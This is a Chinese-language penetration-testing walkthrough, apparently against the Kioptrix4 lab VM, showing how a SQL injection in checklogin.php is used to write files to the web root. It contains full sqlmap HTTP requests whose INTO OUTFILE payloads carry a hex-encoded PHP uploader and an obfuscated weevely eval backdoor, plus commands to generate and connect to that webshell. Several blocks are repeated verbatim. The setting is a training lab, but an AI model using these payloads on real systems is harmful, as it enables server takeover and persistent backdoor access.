POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1826
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-1172%27%20OR%202447%3D2447%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Ftmpulehi.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d2929207b0a20202020246469723d245f524551554553545b2275706c6f6164446972225d3b0a0a202020206966202870687076657273696f6e2829203c2027342e312e3027290a202020207b0a20202020202020202466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a20202020656c73650a202020207b0a20202020202020202466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a202020204063686d6f642824646972202e20222f22202e202466696c652c2030373535293b0a202020206563686f202246696c652075706c6f61646564223b0a7d0a656c7365207b0a202020206563686f20223c666f726d20616374696f6e3d22202e20245f5345525645525b225048505f53454c46225d202e2022206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5c5c7661725c5c7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b0a7d0a3f3e0a%20--%20AND%20%27yJWo%27%3D%27yJWo&Submit=Login
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1826
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-1172%27%20OR%202447%3D2447%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Ftmpulehi.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d2929207b0a20202020246469723d245f524551554553545b2275706c6f6164446972225d3b0a0a202020206966202870687076657273696f6e2829203c2027342e312e3027290a202020207b0a20202020202020202466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a20202020656c73650a202020207b0a20202020202020202466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a202020204063686d6f642824646972202e20222f22202e202466696c652c2030373535293b0a202020206563686f202246696c652075706c6f61646564223b0a7d0a656c7365207b0a202020206563686f20223c666f726d20616374696f6e3d22202e20245f5345525645525b225048505f53454c46225d202e2022206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5c5c7661725c5c7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b0a7d0a3f3e0a%20--%20AND%20%27yJWo%27%3D%27yJWo&Submit=Login
可见sqlmap是利用select into outfile的方法来写文件
查看下当前目录的文件权限
os-shell> ls -la
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
total 68
drwxr-xr-x 5 root root 4096 Jun 27 15:10 .
drwxr-xr-x 14 root root 4096 Feb 4 09:57 ..
-rw-r--r-- 1 root root 1477 Feb 6 11:31 checklogin.php
-rw-r--r-- 1 root root 298 Feb 4 11:11 database.sql
drwxr-xr-x 2 root root 4096 Feb 6 11:44 images
-rw-r--r-- 1 root root 1255 Feb 6 12:07 index.php
drwxr-xr-x 2 root root 4096 Feb 4 18:33 john
-rw-r--r-- 1 root root 176 Feb 4 12:39 login_success.php
-rw-r--r-- 1 root root 78 Feb 4 11:33 logout.php
-rw-r--r-- 1 root root 606 Feb 6 15:42 member.php
drwxr-xr-x 2 root root 4096 Feb 4 18:30 robert
-rw-rw-rw- 1 root root 927 Jun 27 15:10 tmpblegd.php
-rw-rw-rw- 1 root root 927 Jun 27 15:09 tmpbxngb.php
-rw-rw-rw- 1 root root 927 Jun 27 15:04 tmpbypfb.php
-rw-rw-rw- 1 root root 833 Jun 27 15:09 tmpubbwi.php
-rw-rw-rw- 1 root root 833 Jun 27 15:10 tmpujyuo.php
-rw-rw-rw- 1 root root 833 Jun 27 15:03 tmputbuj.php
---
os-shell> ls -la
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
total 68
drwxr-xr-x 5 root root 4096 Jun 27 15:10 .
drwxr-xr-x 14 root root 4096 Feb 4 09:57 ..
-rw-r--r-- 1 root root 1477 Feb 6 11:31 checklogin.php
-rw-r--r-- 1 root root 298 Feb 4 11:11 database.sql
drwxr-xr-x 2 root root 4096 Feb 6 11:44 images
-rw-r--r-- 1 root root 1255 Feb 6 12:07 index.php
drwxr-xr-x 2 root root 4096 Feb 4 18:33 john
-rw-r--r-- 1 root root 176 Feb 4 12:39 login_success.php
-rw-r--r-- 1 root root 78 Feb 4 11:33 logout.php
-rw-r--r-- 1 root root 606 Feb 6 15:42 member.php
drwxr-xr-x 2 root root 4096 Feb 4 18:30 robert
-rw-rw-rw- 1 root root 927 Jun 27 15:10 tmpblegd.php
-rw-rw-rw- 1 root root 927 Jun 27 15:09 tmpbxngb.php
-rw-rw-rw- 1 root root 927 Jun 27 15:04 tmpbypfb.php
-rw-rw-rw- 1 root root 833 Jun 27 15:09 tmpubbwi.php
-rw-rw-rw- 1 root root 833 Jun 27 15:10 tmpujyuo.php
-rw-rw-rw- 1 root root 833 Jun 27 15:03 tmputbuj.php
---
根据上面的文件权限,我们是无法利用sqlmap生成的os-shell文件tmpblegd.php进一步上传自定义文件的,mysql,apache分组权限问题?
下面我们尝试使用sqlmap的–file参数上传任意文件
我比较喜欢的php后门是weevely,类似菜刀,利用weevely生成一个后门
left@Dis9team:~$ sudo weevely generate toor ~/shell.php
[sudo] password for left:
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
+ Backdoor file '/home/left/shell.php' created with password 'toor'.
left@Dis9team:~$ sudo weevely generate toor ~/shell.php
[sudo] password for left:
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
+ Backdoor file '/home/left/shell.php' created with password 'toor'.
使用sqlmap的–file参数上传任意文件
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:18:34
[19:18:34] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:18:34] [INFO] resuming injection data from session file
[19:18:34] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:18:34] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:18:34] [INFO] testing connection to the target url
[19:18:35] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login
---
[19:18:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:18:35] [INFO] fingerprinting the back-end DBMS operating system
[19:18:35] [INFO] the back-end DBMS operating system is Windows
[19:18:35] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:18:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org www.2cto.com
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:18:34
[19:18:34] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:18:34] [INFO] resuming injection data from session file
[19:18:34] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:18:34] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:18:34] [INFO] testing connection to the target url
[19:18:35] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login
---
[19:18:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:18:35] [INFO] fingerprinting the back-end DBMS operating system
[19:18:35] [INFO] the back-end DBMS operating system is Windows
[19:18:35] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:18:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
[*] shutting down at 19:18:35
根据返回的代码,可心看出sqlmapy认定指纹识别数据库服务器为windows(实际为ubuntu)而无法写文件,我们强制加个–os=”Linux”来写试试,
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php --os="Linux" -v 0
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php --os="Linux" -v 0
看看sqlmap返回的代码
[19:21:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:21:15] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:21:15] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
[19:21:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:21:15] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:21:15] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
提示sql注入方法无法写入认定的Linux系统中
下面我们利用burpsuite,修改数据来上传任意代码
利用burpsuite的repeater功能拦截–os-shell数据包,修改上传,我修改后的数据包为
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1337
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-7451%27%20OR%206811%3D6811%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fcmd.php%27%20LINES%20TERMINATED%20BY%200x3c3f706870202024706973343d226e4b76617963704c43427162326c754b474679636d4676613558334e7361574e6c4b4352684c43526a76614b43526876614b537661307a4b7661536b704b536b375a574e6f6279416e50766143386e76614c6952724c69632b4a7a7439223b2024706973323d22506a4d7065326c76617561766156397a5a58516f4a325679636d3979583278765a796373494363765a4756324c3235316247776e4b547661736b7661617a306e76616233496e4f32566a614738674a76617a776e4c766169527276614c69632b4a7a746c646d76614673223b20246b6d203d20227374725f7265706c616365223b2024626a203d2022626b616b736b656b366b346b5f6465636f6b646b65223b2024706973333d224b474a68633255324e46396b5a574e765a47556f63484a6c5a76613139795a58427359574e76616c4b474679636d463576614b766143637657313563647a3163633130764a79776e4c31787a4c7963704c4342766168636e4a686553676e76614a7977223b2024706973313d224a474d394a3276614e766457766135304a76617a7661736b5954306b583076614e7661505430744a525474705a69687976615a584e6c647661436776616b59536b395053647661306279766163674a697661597661674a7661474d6f4a474570223b2024626a203d20246b6d28226b222c2022222c2024626a293b206576616c2824626a28246b6d28227661222c2022222c2024706973312e24706973322e24706973332e24706973342929293b20203f3e%20--%20AND%20%27Exci%27%3D%27Exci&Submit=Login
定义上传位置为/var/www/cmd.php,cmd文件内容为上文weevely生成的后门,下面我们连接试试
left@Dis9team:~$ weevely http://192.168.84.132/cmd.php toor
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
[+] Starting terminal. Shell probe may take a while...
[+] List modules with and show help with :show [module name]
www-data@Kioptrix4:/var/www$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1337
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-7451%27%20OR%206811%3D6811%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fcmd.php%27%20LINES%20TERMINATED%20BY%200x3c3f706870202024706973343d226e4b76617963704c43427162326c754b474679636d4676613558334e7361574e6c4b4352684c43526a76614b43526876614b537661307a4b7661536b704b536b375a574e6f6279416e50766143386e76614c6952724c69632b4a7a7439223b2024706973323d22506a4d7065326c76617561766156397a5a58516f4a325679636d3979583278765a796373494363765a4756324c3235316247776e4b547661736b7661617a306e76616233496e4f32566a614738674a76617a776e4c766169527276614c69632b4a7a746c646d76614673223b20246b6d203d20227374725f7265706c616365223b2024626a203d2022626b616b736b656b366b346b5f6465636f6b646b65223b2024706973333d224b474a68633255324e46396b5a574e765a47556f63484a6c5a76613139795a58427359574e76616c4b474679636d463576614b766143637657313563647a3163633130764a79776e4c31787a4c7963704c4342766168636e4a686553676e76614a7977223b2024706973313d224a474d394a3276614e766457766135304a76617a7661736b5954306b583076614e7661505430744a525474705a69687976615a584e6c647661436776616b59536b395053647661306279766163674a697661597661674a7661474d6f4a474570223b2024626a203d20246b6d28226b222c2022222c2024626a293b206576616c2824626a28246b6d28227661222c2022222c2024706973312e24706973322e24706973332e24706973342929293b20203f3e%20--%20AND%20%27Exci%27%3D%27Exci&Submit=Login
定义上传位置为/var/www/cmd.php,cmd文件内容为上文weevely生成的后门,下面我们连接试试
left@Dis9team:~$ weevely http://192.168.84.132/cmd.php toor
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
[+] Starting terminal. Shell probe may take a while...
[+] List modules with and show help with :show [module name]
www-data@Kioptrix4:/var/www$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
作者:left@Dis9team http://www.dis9.com/newly-discovered-sqlmap-upload-files-a-bug-2.html
上一篇: 利用Metasploit辅助模块检测Mysql安全性
下一篇: reDuh突破硬防连接3389